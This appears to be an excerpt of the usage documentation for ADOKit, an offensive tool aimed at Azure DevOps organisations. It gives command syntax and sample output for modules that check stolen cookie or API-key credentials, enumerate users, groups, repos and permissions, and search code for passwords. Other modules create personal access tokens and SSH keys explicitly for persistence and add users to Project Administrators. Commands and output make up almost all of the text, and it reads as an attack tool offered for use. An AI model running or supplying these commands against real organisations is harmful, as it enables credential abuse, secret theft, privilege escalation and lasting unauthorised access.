    ADOKit.exe check /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

    Example Output

    C:\>ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/YourOrganization

    ==================================================
    Module: check
    Auth Type: API Key
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 3/28/2023 3:33:01 PM
    ==================================================


    [*] INFO: Checking if organization provided uses Azure DevOps

    [+] SUCCESS: Organization provided exists in Azure DevOps


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    3/28/23 19:33:02 Finished execution of check

    Whoami

    Use Case

    Get the current user and the user's group memberships

    Syntax

    Provide the whoami module, along with any relevant authentication information and URL. This will output the current user and all of their group memberships.

    ADOKit.exe whoami /credential:apiKey /url:https://dev.azure.com/organizationName

    ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

    Example Output

    C:\>ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization

    ==================================================
    Module: whoami
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/4/2023 11:33:12 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    Username | Display Name | UPN
    ------------------------------------------------------------------------------------------------------------------------------------------------------------
    jsmith | John Smith | jsmith@YourOrganization.onmicrosoft.com


    [*] INFO: Listing group memberships for the current user


    Group UPN | Display Name | Description
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    [YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
    [TestProject2]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
    [MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
    [YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.

    4/4/23 15:33:19 Finished execution of whoami

    List Repos

    Use Case

    Discover repositories being used in Azure DevOps instance

    Syntax

    Provide the listrepo module, along with any relevant authentication information and URL. This will output the repository name and URL.

    ADOKit.exe listrepo /credential:apiKey /url:https://dev.azure.com/organizationName

    ADOKit.exe listrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

    Example Output

    C:\>ADOKit.exe listrepo /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

    ==================================================
    Module: listrepo
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 3/29/2023 8:41:50 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    Name | URL
    -----------------------------------------------------------------------------------
    TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
    MaraudersMap | https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap
    SomeOtherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/SomeOtherRepo
    AnotherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/AnotherRepo
    ProjectWithMultipleRepos | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/ProjectWithMultipleRepos
    TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject

    3/29/23 12:41:53 Finished execution of listrepo

    Search Repos

    Use Case

    Search for repositories by repository name in Azure DevOps instance

    Syntax

    Provide the searchrepo module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching repository name and URL.

    ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred

    ADOKit.exe searchrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred

    Example Output

    C:\>ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"test"

    ==================================================
    Module: searchrepo
    Auth Type: API Key
    Search Term: test
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 3/29/2023 9:26:57 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    Name | URL
    -----------------------------------------------------------------------------------
    TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
    TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject

    3/29/23 13:26:59 Finished execution of searchrepo

    List Projects

    Use Case

    Discover projects being used in Azure DevOps instance

    Syntax

    Provide the listproject module, along with any relevant authentication information and URL. This will output the project name, visibility (public or private) and URL.

    ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/organizationName

    ADOKit.exe listproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

    Example Output

    C:\>ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/YourOrganization

    ==================================================
    Module: listproject
    Auth Type: API Key
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/4/2023 7:44:59 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    Name | Visibility | URL
    -----------------------------------------------------------------------------------------------------
    TestProject2 | private | https://dev.azure.com/YourOrganization/TestProject2
    MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
    ProjectWithMultipleRepos | private | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos
    TestProject | private | https://dev.azure.com/YourOrganization/TestProject

    4/4/23 11:45:04 Finished execution of listproject

    Search Projects

    Use Case

    Search for projects by project name in Azure DevOps instance

    Syntax

    Provide the searchproject module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching project name, visibility (public or private) and URL.

    ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred

    ADOKit.exe searchproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred

    Example Output

    C:\>ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"map"

    ==================================================
    Module: searchproject
    Auth Type: API Key
    Search Term: map
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/4/2023 7:45:30 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    Name | Visibility | URL
    -----------------------------------------------------------------------------------------------------
    MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap

    4/4/23 11:45:31 Finished execution of searchproject

    Search Code

    Use Case

    Search for code containing a given keyword in Azure DevOps instance

    Syntax

    Provide the searchcode module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching code file, along with the line in the code that matched.

    ADOKit.exe searchcode /credential:apiKey /url:https://dev.azure.com/organizationName /search:password

    ADOKit.exe searchcode /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:password

    Example Output

    C:\>ADOKit.exe searchcode /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"password"

    ==================================================
    Module: searchcode
    Auth Type: Cookie
    Search Term: password
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 3/29/2023 3:22:21 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [>] URL: https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap?path=/Test.cs
    |_ Console.WriteLine("PassWord");
    |_ this is some text that has a password in it

    [>] URL: https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2?path=/Program.cs
    |_ Console.WriteLine("PaSsWoRd");

    [*] Match count : 3

    3/29/23 19:22:22 Finished execution of searchcode

    Search Files

    Use Case

    Search for files in repositories containing a given keyword in the file name in Azure DevOps

    Syntax

    Provide the searchfile module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching file in its respective repository.

    ADOKit.exe searchfile /credential:apiKey /url:https://dev.azure.com/organizationName /search:azure-pipeline

    ADOKit.exe searchfile /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:azure-pipeline

    Example Output

    C:\>ADOKit.exe searchfile /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"test"

    ==================================================
    Module: searchfile
    Auth Type: Cookie
    Search Term: test
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 3/29/2023 11:28:34 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    File URL
    ----------------------------------------------------------------------------------------------------
    https://dev.azure.com/YourOrganization/MaraudersMap/_git/4f159a8e-5425-4cb5-8d98-31e8ac86c4fa?path=/Test.cs
    https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/c1ba578c-1ce1-46ab-8827-f245f54934e9?path=/Test.cs
    https://dev.azure.com/YourOrganization/TestProject/_git/fbcf0d6d-3973-4565-b641-3b1b897cfa86?path=/test.cs

    3/29/23 15:28:37 Finished execution of searchfile

    Create PAT

    Use Case

    Create a personal access token (PAT) for a user that can be used for persistence to an Azure DevOps instance.

    Syntax

    Provide the createpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, date valid until, and token content for the PAT created. The name of the PAT created will be ADOKit- followed by a random string of 8 characters. The date the PAT is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.

    ADOKit.exe createpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

    Example Output

    C:\>ADOKit.exe createpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

    ==================================================
    Module: createpat
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 3/31/2023 2:33:09 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    PAT ID | Name | Scope | Valid Until | Token Value
    ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM | tokenValueWouldBeHere

    3/31/23 18:33:10 Finished execution of createpat

    List PATs

    Use Case

    List all personal access tokens (PATs) for a given user in an Azure DevOps instance.

    Syntax

    Provide the listpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, and date valid until for all active PATs for the user.

    ADOKit.exe listpat /credential:apiKey /url:https://dev.azure.com/organizationName

    ADOKit.exe listpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

    Example Output

    C:\>ADOKit.exe listpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

    ==================================================
    Module: listpat
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 3/31/2023 2:33:17 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    PAT ID | Name | Scope | Valid Until
    -------------------------------------------------------------------------------------------------------------------------------------------
    9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
    8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM

    3/31/23 18:33:18 Finished execution of listpat

    Remove PAT

    Use Case

    Remove a PAT for a given user in an Azure DevOps instance.

    Syntax

    Provide the removepat module, along with any relevant authentication information and URL. Additionally, provide the ID for the PAT in the /id: argument. This will output whether the PAT was removed, and then list the current active PATs for the user after performing the removal.

    ADOKit.exe removepat /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...

    ADOKit.exe removepat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...

    Example Output

    C:\>ADOKit.exe removepat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:0b20ac58-fc65-4b66-91fe-4ff909df7298

    ==================================================
    Module: removepat
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/3/2023 11:04:59 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [+] SUCCESS: PAT with ID 0b20ac58-fc65-4b66-91fe-4ff909df7298 was removed successfully.

    PAT ID | Name | Scope | Valid Until
    -------------------------------------------------------------------------------------------------------------------------------------------
    9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM

    4/3/23 15:05:00 Finished execution of removepat

    Create SSH Key

    Use Case

    Create an SSH key for a user that can be used for persistence to an Azure DevOps instance.

    Syntax

    Provide the createsshkey module, along with any relevant authentication information and URL. Additionally, provide your public SSH key in the /sshkey: argument. This will output the SSH key ID, name, scope, date valid until, and the last 20 characters of the public SSH key for the SSH key created. The name of the SSH key created will be ADOKit- followed by a random string of 8 characters. The date the SSH key is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.

    ADOKit.exe createsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /sshkey:"ssh-rsa ABC123"

    Example Output

    C:\>ADOKit.exe createsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /sshkey:"ssh-rsa ABC123"

    ==================================================
    Module: createsshkey
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/3/2023 2:51:22 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    SSH Key ID | Name | Scope | Valid Until | Public SSH Key
    -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
    fbde9f3e-bbe3-4442-befb-c2ddeab75c58 | ADOKit-iCBfYfFR | app_token | 4/3/2024 12:00:00 AM | ...hOLNYMk5LkbLRMG36RE=

    4/3/23 18:51:24 Finished execution of createsshkey

    List SSH Keys

    Use Case

    List all public SSH keys for a given user in an Azure DevOps instance.

    Syntax

    Provide the listsshkey module, along with any relevant authentication information and URL. This will output the SSH key ID, name, scope, and date valid until for all active SSH keys for the user. Additionally, it will print the last 20 characters of each public SSH key.

    ADOKit.exe listsshkey /credential:apiKey /url:https://dev.azure.com/organizationName

    ADOKit.exe listsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

    Example Output

    C:\>ADOKit.exe listsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

    ==================================================
    Module: listsshkey
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/3/2023 11:37:10 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    SSH Key ID | Name | Scope | Valid Until | Public SSH Key
    -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
    ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

    4/3/23 15:37:11 Finished execution of listsshkey

    Remove SSH Key

    Use Case

    Remove an SSH key for a given user in an Azure DevOps instance.

    Syntax

    Provide the removesshkey module, along with any relevant authentication information and URL. Additionally, provide the ID for the SSH key in the /id: argument. This will output whether the SSH key was removed, and then list the current active SSH keys for the user after performing the removal.

    ADOKit.exe removesshkey /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...

    ADOKit.exe removesshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...

    Example Output

    C:\>ADOKit.exe removesshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:a199c036-d7ed-4848-aae8-2397470aff97

    ==================================================
    Module: removesshkey
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/3/2023 1:50:08 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [+] SUCCESS: SSH key with ID a199c036-d7ed-4848-aae8-2397470aff97 was removed successfully.

    SSH Key ID | Name | Scope | Valid Until | Public SSH Key
    -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
    ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

    4/3/23 17:50:09 Finished execution of removesshkey

    List Users

    Use Case

    List users within an Azure DevOps instance

    Syntax

    Provide the listuser module, along with any relevant authentication information and URL. This will output the username, display name and user principal name.

    ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/organizationName

    ADOKit.exe listuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

    Example Output

    C:\>ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/YourOrganization

    ==================================================
    Module: listuser
    Auth Type: API Key
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/3/2023 4:12:07 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    Username | Display Name | UPN
    ------------------------------------------------------------------------------------------------------------------------------------------------------------
    user1 | User 1 | user1@YourOrganization.onmicrosoft.com
    jsmith | John Smith | jsmith@YourOrganization.onmicrosoft.com
    rsmith | Ron Smith | rsmith@YourOrganization.onmicrosoft.com
    user2 | User 2 | user2@YourOrganization.onmicrosoft.com

    4/3/23 20:12:08 Finished execution of listuser

    Search User

    Use Case

    Search for given user(s) in Azure DevOps instance

    Syntax

    Provide the searchuser module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching username, display name and user principal name.

    ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/organizationName /search:user

    ADOKit.exe searchuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:user

    Example Output

    C:\>ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"user"

    ==================================================
    Module: searchuser
    Auth Type: API Key
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/3/2023 4:12:23 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    Username | Display Name | UPN
    ------------------------------------------------------------------------------------------------------------------------------------------------------------
    user1 | User 1 | user1@YourOrganization.onmicrosoft.com
    user2 | User 2 | user2@YourOrganization.onmicrosoft.com

    4/3/23 20:12:24 Finished execution of searchuser

    List Groups

    Use Case

    List groups within an Azure DevOps instance

    Syntax

    Provide the listgroup module, along with any relevant authentication information and URL. This will output the user principal name, display name and description of group.

    ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/organizationName

    ADOKit.exe listgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

    Example Output

    C:\>ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization

    ==================================================
    Module: listgroup
    Auth Type: API Key
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/3/2023 4:48:45 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    UPN | Display Name | Description
    ------------------------------------------------------------------------------------------------------------------------------------------------------------
    [TestProject]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
    [TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
    [YourOrganization]\Project-Scoped Users | Project-Scoped Users | Members of this group will have limited visibility to organization-level data
    [ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
    [MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
    [YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
    [MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
    [TEAM FOUNDATION]\Enterprise Service Accounts | Enterprise Service Accounts | Members of this group have service-level permissions in this enterprise. For service accounts only.
    [YourOrganization]\Security Service Group | Security Service Group | Identities which are granted explicit permission to a resource will be automatically added to this group if they were not previously a member of any other group.
    [TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management


    ---SNIP---

    4/3/23 20:48:46 Finished execution of listgroup

    Search Groups

    Use Case

    Search for given group(s) in Azure DevOps instance

    Syntax

    Provide the searchgroup module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group.

    ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/organizationName /search:"someGroup"

    ADOKit.exe searchgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:"someGroup"

    Example Output

    C:\>ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"admin"

    ==================================================
    Module: searchgroup
    Auth Type: API Key
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/3/2023 4:48:41 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    UPN | Display Name | Description
    ------------------------------------------------------------------------------------------------------------------------------------------------------------
    [TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
    [ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
    [TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
    [TestProject]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
    [MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
    [TestProject2]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
    [YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
    [ProjectWithMultipleRepos]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
    [MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
    [YourOrganization]\Project Collection Build Administrators | Project Collection Build Administrators | Members of this group should include accounts for people who should be able to administer the build resources.
    [TestProject]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.

    4/3/23 20:48:42 Finished execution of searchgroup
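
    For context, the group listing and searching shown by listgroup and searchgroup maps onto the documented Azure DevOps Graph REST API (see the References section). The snippet below is a minimal Python sketch, not ADOKit's actual implementation; the organization name, personal access token, and search term are placeholder assumptions, and pagination/error handling are omitted for brevity.

    import requests

    ORG = "YourOrganization"   # placeholder organization name
    PAT = "apiKey"             # placeholder personal access token
    SEARCH = "admin"           # optional filter term, as used by searchgroup

    # The Graph API is served from the vssps host; each group carries a principal
    # name, display name, and description, similar to ADOKit's table output.
    # The exact api-version value may differ in your organization.
    url = f"https://vssps.dev.azure.com/{ORG}/_apis/graph/groups?api-version=7.1-preview.1"
    resp = requests.get(url, auth=("", PAT))   # PAT goes in the Basic-auth password field
    resp.raise_for_status()

    for group in resp.json().get("value", []):
        name = group.get("principalName", "")
        if SEARCH.lower() in name.lower():
            print(f'{name} | {group.get("displayName", "")} | {group.get("description", "")}')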

    Get Group Members

    Use Case

    List all group members for a given group

    Syntax

    Provide the getgroupmembers module and the group(s) you would like to search for in the /group: command-line argument, along with any relevant authentication information and URL. This will output the user principal name of each matching group, along with each member of that group, including the member's mail address and display name.

    ADOKit.exe getgroupmembers /credential:apiKey /url:https://dev.azure.com/organizationName /group:"someGroup"

    ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /group:"someGroup"

    Example Output

    C:\>ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /group:"admin"

    ==================================================
    Module: getgroupmembers
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/4/2023 9:11:03 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    [TestProject2]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
    [TestProject2]\Build Administrators | user2@YourOrganization.onmicrosoft.com | User 2
    [MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
    [MaraudersMap]\Project Administrators | rsmith@YourOrganization.onmicrosoft.com | Ron Smith
    [TestProject2]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1
    [TestProject2]\Project Administrators | user2@YourOrganization.onmicrosoft.com | User 2
    [YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
    [ProjectWithMultipleRepos]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
    [MaraudersMap]\Build Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins

    4/4/23 13:11:09 Finished execution of getgroupmembers
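
    Group membership data of this kind is exposed through the Graph Memberships endpoint of the Azure DevOps REST API. The following is an illustrative sketch only (the organization, PAT, and group descriptor are placeholders); each returned member descriptor would still need a follow-up Graph lookup to resolve the mail address and display name shown in ADOKit's output.

    import requests

    ORG = "YourOrganization"              # placeholder
    PAT = "apiKey"                        # placeholder
    GROUP_DESCRIPTOR = "vssgp.EXAMPLE"    # hypothetical descriptor taken from a groups listing

    # direction=down lists the members of the group; the api-version may vary.
    url = (f"https://vssps.dev.azure.com/{ORG}/_apis/graph/Memberships/"
           f"{GROUP_DESCRIPTOR}?direction=down&api-version=7.1-preview.1")
    resp = requests.get(url, auth=("", PAT))
    resp.raise_for_status()

    for membership in resp.json().get("value", []):
        print(membership.get("memberDescriptor"))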

    Get Project Permissions

    Use Case

    Get a listing of who has permissions to a given project.

    Syntax

    Provide the getpermissions module and the project you would like to search for in the /project: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for each matching group. Additionally, this will output the group members for each of those groups.

    ADOKit.exe getpermissions /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someproject"

    ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someproject"

    Example Output

    C:\>ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

    ==================================================
    Module: getpermissions
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/4/2023 9:11:16 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    UPN | Display Name | Description
    ------------------------------------------------------------------------------------------------------------------------------------------------------------
    [MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
    [MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
    [MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
    [MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
    [MaraudersMap]\Project Valid Users | Project Valid Users | Members of this group have access to the team project.
    [MaraudersMap]\Readers | Readers | Members of this group have access to the team project.


    [*] INFO: Listing group members for each group that has permissions to this project



    GROUP NAME: [MaraudersMap]\Build Administrators

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


    GROUP NAME: [MaraudersMap]\Contributors

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    [MaraudersMap]\Contributors | user1@YourOrganization.onmicrosoft.com | User 1
    [MaraudersMap]\Contributors | user2@YourOrganization.onmicrosoft.com | User 2


    GROUP NAME: [MaraudersMap]\MaraudersMap Team

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    [MaraudersMap]\MaraudersMap Team | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins


    GROUP NAME: [MaraudersMap]\Project Administrators

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    [MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins


    GROUP NAME: [MaraudersMap]\Project Valid Users

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


    GROUP NAME: [MaraudersMap]\Readers

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    [MaraudersMap]\Readers | jsmith@YourOrganization.onmicrosoft.com | John Smith

    4/4/23 13:11:18 Finished execution of getpermissions

    Add Project Admin

    Use Case

    Add a user to the Project Administrators group for a given project.

    Syntax

    Provide the addprojectadmin module along with a /project: and /user: for a given user to be added to the Project Administrators group for the given project. Additionally, provide any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

    ADOKit.exe addprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

    ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

    Example Output

    C:\>ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

    ==================================================
    Module: addprojectadmin
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/4/2023 2:52:45 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [*] INFO: Attempting to add user1 to the Project Administrators group for the maraudersmap project.

    [+] SUCCESS: User successfully added

    Group | Mail Address | Display Name
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    [MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
    [MaraudersMap]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1

    4/4/23 18:52:47 Finished execution of addprojectadmin
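
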